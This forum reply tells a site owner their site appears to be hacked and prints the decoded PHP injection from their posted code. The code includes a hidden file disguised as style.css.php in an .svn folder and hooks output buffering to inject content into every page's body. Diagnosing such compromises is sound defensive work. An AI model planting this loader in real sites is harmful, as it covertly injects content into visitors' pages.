Hi,
It seems that your site has been hacked.
The code you posted here decodes to the following (indentation added):
[php]if (function_exists('ob_start') && !isset($GLOBALS['sh_no'])) {
$GLOBALS['sh_no'] = 1;
if (file_exists('/home/gtilflm/public_html/catalog/ext/modules/payment/paypal/images/.svn/tmp/prop-base/style.css.php')) {
include_once('/home/gtilflm/public_html/catalog/ext/modules/payment/paypal/images/.svn/tmp/prop-base/style.css.php');
if (function_exists('gml') && !function_exists('dgobh')) {
if (!function_exists('gzdecode')) {
function gzdecode($R20FD65E9C7406034FADC682F06732868) {
$R6B6E98CDE8B33087A33E4D3A497BD86B = ord(substr($R20FD65E9C7406034FADC682F06732868,3,1));
$R60169CD1C47B7A7A85AB44F884635E41=10;
$R0D54236DA20594EC13FC81B209733931=0;
if ($R6B6E98CDE8B33087A33E4D3A497BD86B & 4) {
$R0D54236DA20594EC13FC81B209733931 = unpack('v',substr($R20FD65E9C7406034FADC682F06732868,10,2));
$R0D54236DA20594EC13FC81B209733931 = $R0D54236DA20594EC13FC81B209733931[1];
$R60169CD1C47B7A7A85AB44F884635E41 += 2+$R0D54236DA20594EC13FC81B209733931;
}
if ($R6B6E98CDE8B33087A33E4D3A497BD86B & 8) {
$R60169CD1C47B7A7A85AB44F884635E41 = strpos($R20FD65E9C7406034FADC682F06732868,chr(0),$R60169CD1C47B7A7A85AB44F884635E41)+1;
}
if ($R6B6E98CDE8B33087A33E4D3A497BD86B & 16) {
$R60169CD1C47B7A7A85AB44F884635E41 = strpos($R20FD65E9C7406034FADC682F06732868,chr(0),$R60169CD1C47B7A7A85AB44F884635E41)+1;
}
if ($R6B6E98CDE8B33087A33E4D3A497BD86B & 2) {
$R60169CD1C47B7A7A85AB44F884635E41 += 2;
}
$RC4A5B5E310ED4C323E04D72AFAE39F53 = gzinflate(substr($R20FD65E9C7406034FADC682F06732868,$R60169CD1C47B7A7A85AB44F884635E41));
if ($RC4A5B5E310ED4C323E04D72AFAE39F53 === FALSE) {
$RC4A5B5E310ED4C323E04D72AFAE39F53 = $R20FD65E9C7406034FADC682F06732868;
}
return $RC4A5B5E310ED4C323E04D72AFAE39F53;
}
}
function dgobh($RDA3E61414E50AEE968132F03D265E0CF) {
Header('Content-Encoding: none');
$R3E33E017CD76B9B7E6C7364FB91E2E90 = gzdecode($RDA3E61414E50AEE968132F03D265E0CF);
if (preg_match('/\<body/si', $R3E33E017CD76B9B7E6C7364FB91E2E90)) {
return preg_replace('/(\<body[^\>]*\>)/si','$1' . gml(), $R3E33E017CD76B9B7E6C7364FB91E2E90);
} else {
return gml().$R3E33E017CD76B9B7E6C7364FB91E2E90;
}
}
ob_start('dgobh');
}
}
}[/php]
Quick search for the first line of this code gives some links, e.g. http://www.simplemachines.org/community/index.php?topic=291486.0
I guess it's where you should contact your hosting service with that info to fix this and close the attack vector(s).